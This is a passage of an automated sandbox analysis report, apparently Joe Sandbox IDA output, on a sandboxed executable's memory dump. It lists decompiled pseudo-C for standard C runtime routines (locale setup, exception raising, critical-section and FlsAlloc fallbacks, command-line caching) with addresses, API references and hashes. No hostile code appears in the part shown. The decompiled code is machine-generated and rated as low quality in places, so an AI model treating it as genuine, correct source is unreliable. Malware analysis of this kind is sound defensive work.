                                                                                      0x004070a3
                                                                                      0x004070a6
                                                                                      0x004070a9
                                                                                      0x004070ac
                                                                                      0x004070af
                                                                                      0x004070b2
                                                                                      0x004070b5
                                                                                      0x004070b8
                                                                                      0x004070bb
                                                                                      0x004070be
                                                                                      0x004070c1
                                                                                      0x004070c4
                                                                                      0x004070ca
                                                                                      0x004070cd
                                                                                      0x004070d3
                                                                                      0x004070d9
                                                                                      0x004070df
                                                                                      0x004070e5
                                                                                      0x004070e8
                                                                                      0x004070ee
                                                                                      0x004070f1
                                                                                      0x004070f7
                                                                                      0x004070fd
                                                                                      0x00407100
                                                                                      0x00407106
                                                                                      0x0040710a
                                                                                      0x00407111
                                                                                      0x00407117
                                                                                      0x0040711a
                                                                                      0x0040711d
                                                                                      0x00407120
                                                                                      0x00407123
                                                                                      0x00407129
                                                                                      0x0040712f
                                                                                      0x00407135
                                                                                      0x0040713b
                                                                                      0x00407141
                                                                                      0x00407144
                                                                                      0x0040714a
                                                                                      0x00407150
                                                                                      0x00407156
                                                                                      0x0040715c
                                                                                      0x00407163
                                                                                      0x00407166
                                                                                      0x00407169
                                                                                      0x00407173
                                                                                      0x00407181

                                                                                      APIs
                                                                                      • std::locale::_Init.LIBCPMT ref: 00407092
                                                                                        • Part of subcall function 00412660: __EH_prolog3.LIBCMT ref: 00412667
                                                                                        • Part of subcall function 00412660: std::_Lockit::_Lockit.LIBCPMT ref: 00412672
                                                                                        • Part of subcall function 00412660: std::locale::_Setgloballocale.LIBCPMT ref: 0041268D
                                                                                        • Part of subcall function 00412660: _Yarn.LIBCPMT ref: 004126A3
                                                                                        • Part of subcall function 00412660: std::_Lockit::~_Lockit.LIBCPMT ref: 004126E3
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3InitLockit::_Lockit::~_SetgloballocaleYarn
                                                                                      • String ID: _@$P_@
                                                                                      • API String ID: 3852638621-4293464667
                                                                                      • Opcode ID: 00e6e8a9406ab1f205d36afc09cbd4fa199e6799f42c6e9903ddd837ca3ffee9
                                                                                      • Instruction ID: 7be0e8f9f6de9a8e6829aca24daf0f72573013ab6ac6fb37b57ee9c761daf7a2
                                                                                      • Opcode Fuzzy Hash: 00e6e8a9406ab1f205d36afc09cbd4fa199e6799f42c6e9903ddd837ca3ffee9
                                                                                      • Instruction Fuzzy Hash: 8B41D5B4900315CFD740CF59D990B9ABBF4FF09310F1145AAD908AB3A2E3B99944CFA4
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 34%
                                                                                      			E004126F0(void* __ecx, void* __esi, intOrPtr _a4) {
                                                                                      				intOrPtr* _v8;
                                                                                      				char _v12;
                                                                                      				intOrPtr* _t18;
                                                                                      				intOrPtr* _t21;
                                                                                      				intOrPtr _t25;
                                                                                      				signed int _t37;
                                                                                      
                                                                                      				_push(__ecx);
                                                                                      				_push(__ecx);
                                                                                      				_t25 = _a4;
                                                                                      				E0041247D( &_v12, 0);
                                                                                      				_t37 =  *(_t25 + 0xc);
                                                                                      				if(_t37 == 0) {
                                                                                      					L7:
                                                                                      					E0041AC1E( *((intOrPtr*)(_t25 + 8)));
                                                                                      					return E004124D5( &_v12);
                                                                                      				}
                                                                                      				do {
                                                                                      					_t37 = _t37 - 1;
                                                                                      					_t18 =  *((intOrPtr*)( *((intOrPtr*)(_t25 + 8)) + _t37 * 4));
                                                                                      					_v8 = _t18;
                                                                                      					if(_t18 != 0) {
                                                                                      						 *0x4331a4();
                                                                                      						_t21 =  *((intOrPtr*)( *((intOrPtr*)( *_t18 + 8))))();
                                                                                      						_v8 = _t21;
                                                                                      						if(_t21 != 0) {
                                                                                      							 *0x4331a4(1);
                                                                                      							 *((intOrPtr*)( *((intOrPtr*)( *_t21))))();
                                                                                      						}
                                                                                      					}
                                                                                      				} while (_t37 != 0);
                                                                                      				goto L7;
                                                                                      			}









                                                                                      0x004126f3
                                                                                      0x004126f4
                                                                                      0x004126f6
                                                                                      0x004126ff
                                                                                      0x00412704
                                                                                      0x00412709
                                                                                      0x0041274b
                                                                                      0x0041274e
                                                                                      0x0041275f
                                                                                      0x0041275f
                                                                                      0x0041270c
                                                                                      0x0041270f
                                                                                      0x00412710
                                                                                      0x00412713
                                                                                      0x00412718
                                                                                      0x00412721
                                                                                      0x0041272a
                                                                                      0x0041272c
                                                                                      0x00412731
                                                                                      0x0041273b
                                                                                      0x00412744
                                                                                      0x00412744
                                                                                      0x00412731
                                                                                      0x00412746
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 004126FF
                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00412757
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_
                                                                                      • String ID: 0'@
                                                                                      • API String ID: 593203224-1999884151
                                                                                      • Opcode ID: 4f7db88a21a1d9844e7a49aea1ea331c2e787f2e877a7211f00c6ac3fe0ee813
                                                                                      • Instruction ID: 6fd8943e669119d7ec51c0b49802595411a9acec9e5ce50be34f68a5b4cfed9f
                                                                                      • Opcode Fuzzy Hash: 4f7db88a21a1d9844e7a49aea1ea331c2e787f2e877a7211f00c6ac3fe0ee813
                                                                                      • Instruction Fuzzy Hash: C4014C35600505EFCB05DF55CA95D9ABBB5AF84710B14409AE9059B3A1EFB0EE80CB94
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 16%
                                                                                      			E00414B7B(intOrPtr* _a4, signed char* _a8) {
                                                                                      				signed char* _v8;
                                                                                      				intOrPtr _v12;
                                                                                      				char _v16;
                                                                                      				char _v20;
                                                                                      				intOrPtr* _t15;
                                                                                      				DWORD* _t17;
                                                                                      				intOrPtr _t18;
                                                                                      				intOrPtr _t21;
                                                                                      				intOrPtr* _t23;
                                                                                      				signed char* _t25;
                                                                                      				void* _t26;
                                                                                      
                                                                                      				_t15 = _a4;
                                                                                      				_t25 = _a8;
                                                                                      				_t21 = 0x19930520;
                                                                                      				_v20 = _t15;
                                                                                      				if(_t25 == 0) {
                                                                                      					L5:
                                                                                      					_t10 =  &_v20; // 0x4123ef
                                                                                      					_v12 =  *_t10;
                                                                                      					_t17 =  &_v16;
                                                                                      					_v16 = _t21;
                                                                                      					_v8 = _t25;
                                                                                      					RaiseException(0xe06d7363, 1, 3, _t17);
                                                                                      					return _t17;
                                                                                      				}
                                                                                      				if(( *_t25 & 0x00000010) == 0) {
                                                                                      					L3:
                                                                                      					if(( *_t25 & 0x00000008) != 0) {
                                                                                      						_t21 = 0x1994000;
                                                                                      					}
                                                                                      					goto L5;
                                                                                      				}
                                                                                      				_t23 =  *_t15 - 4;
                                                                                      				_t18 =  *_t23;
                                                                                      				_t6 = _t18 + 0x20; // 0x0
                                                                                      				_t7 = _t18 + 0x18; // 0x4418ec
                                                                                      				_t25 =  *_t7;
                                                                                      				 *0x4331a4(_t23, _t26);
                                                                                      				 *((intOrPtr*)( *_t6))();
                                                                                      				if(_t25 == 0) {
                                                                                      					goto L5;
                                                                                      				}
                                                                                      				goto L3;
                                                                                      			}














                                                                                      0x00414b81
                                                                                      0x00414b86
                                                                                      0x00414b89
                                                                                      0x00414b8e
                                                                                      0x00414b93
                                                                                      0x00414bc2
                                                                                      0x00414bc2
                                                                                      0x00414bc5
                                                                                      0x00414bc8
                                                                                      0x00414bd5
                                                                                      0x00414bd8
                                                                                      0x00414bdb
                                                                                      0x00414be4
                                                                                      0x00414be4
                                                                                      0x00414b98
                                                                                      0x00414bb8
                                                                                      0x00414bbb
                                                                                      0x00414bbd
                                                                                      0x00414bbd
                                                                                      0x00000000
                                                                                      0x00414bbb
                                                                                      0x00414b9c
                                                                                      0x00414ba1
                                                                                      0x00414ba3
                                                                                      0x00414ba8
                                                                                      0x00414ba8
                                                                                      0x00414bab
                                                                                      0x00414bb1
                                                                                      0x00414bb6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,?,?,004123EF,?,00441908,00402904,string too long,00402904,?,?,?), ref: 00414BDB
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExceptionRaise
                                                                                      • String ID: 0'@$#A
                                                                                      • API String ID: 3997070919-2128406668
                                                                                      • Opcode ID: 4448a2e252afef4bf1126883b95734932f5fca6c41fa96ffda61e212ad3e9f0e
                                                                                      • Instruction ID: effdd90de390f4434539d58b8c5eaf0cb76ce4bbf9f056b46b12c201dad2b2f8
                                                                                      • Opcode Fuzzy Hash: 4448a2e252afef4bf1126883b95734932f5fca6c41fa96ffda61e212ad3e9f0e
                                                                                      • Instruction Fuzzy Hash: DA01A275A00208AFCB059F68D980B9EBBF8FF84710F15415AEA55AB390D770EE40CBD0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 37%
                                                                                      			E004234AC(void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
                                                                                      				intOrPtr* _t11;
                                                                                      
                                                                                      				_t11 = E0042319F(0xe, "InitializeCriticalSectionEx", 0x437378, 0x437380);
                                                                                      				if(_t11 == 0) {
                                                                                      					return InitializeCriticalSectionAndSpinCount(_a4, _a8);
                                                                                      				}
                                                                                      				 *0x4331a4(_a4, _a8, _a12);
                                                                                      				return  *_t11();
                                                                                      			}




                                                                                      0x004234c8
                                                                                      0x004234cf
                                                                                      0x00000000
                                                                                      0x004234ec
                                                                                      0x004234dc
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,00421CE3,-00000020,00000FA0,00000000,00000002,00000040,?,9900EC21), ref: 004234EC
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: CountCriticalInitializeSectionSpin
                                                                                      • String ID: 0'@$InitializeCriticalSectionEx
                                                                                      • API String ID: 2593887523-1065118902
                                                                                      • Opcode ID: 21c627221255b91780c5cf942384412f78e7e91c2c5f48854221c6c00cb33873
                                                                                      • Instruction ID: 15c8f457bd513b11090f3eb9096ea7fe53204c1ecbb00c72ce381f777ba775fd
                                                                                      • Opcode Fuzzy Hash: 21c627221255b91780c5cf942384412f78e7e91c2c5f48854221c6c00cb33873
                                                                                      • Instruction Fuzzy Hash: D4E09232684228B7CF222F51DC06E9E7F21EB047A2F448122FD0815160CABE8A20E6C8
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 37%
                                                                                      			E00423332(void* __eflags, intOrPtr _a4) {
                                                                                      				intOrPtr* _t7;
                                                                                      
                                                                                      				_t7 = E0042319F(0x1e, "FlsAlloc", 0x437418, 0x437420);
                                                                                      				if(_t7 == 0) {
                                                                                      					return TlsAlloc();
                                                                                      				}
                                                                                      				 *0x4331a4(_a4);
                                                                                      				return  *_t7();
                                                                                      			}




                                                                                      0x0042334e
                                                                                      0x00423355
                                                                                      0x00000000
                                                                                      0x00423366
                                                                                      0x0042335c
                                                                                      0x00000000

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: Alloc
                                                                                      • String ID: 0'@$FlsAlloc
                                                                                      • API String ID: 2773662609-3437125672
                                                                                      • Opcode ID: d0521f316c186076e85c0e7d99fd5a43a8ed6391bc7b8b5742bd1b257a1712c1
                                                                                      • Instruction ID: e6d9a41c36321a43309d7c432a8ff7bc219acdd39542b85e451266cd1ef2c48d
                                                                                      • Opcode Fuzzy Hash: d0521f316c186076e85c0e7d99fd5a43a8ed6391bc7b8b5742bd1b257a1712c1
                                                                                      • Instruction Fuzzy Hash: C0E07231B8023877C6203E60AC0AA9EBE24CB08BB3F400033FE00112808EAD0B1096ED
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 100%
                                                                                      			E0041E40D() {
                                                                                      
                                                                                      				 *0x444afc = GetCommandLineA();
                                                                                      				 *0x444b00 = GetCommandLineW();
                                                                                      				return 1;
                                                                                      			}



                                                                                      0x0041e413
                                                                                      0x0041e41e
                                                                                      0x0041e425

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: CommandLine
                                                                                      • String ID: P3{
                                                                                      • API String ID: 3253501508-2688629286
                                                                                      • Opcode ID: de68ca8399ab76325e372adec481eb7b76d557d3fe888c1639c3f485e1507bfe
                                                                                      • Instruction ID: 70c23cb0090479d647e0fb3c3e77e38a403cf0719dc92b4d7b37de3ce0558119
                                                                                      • Opcode Fuzzy Hash: de68ca8399ab76325e372adec481eb7b76d557d3fe888c1639c3f485e1507bfe
                                                                                      • Instruction Fuzzy Hash: 6BB048BCC002008BCB008F62B8192843BA0B28960338064B5D42182621DB384900DF28
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%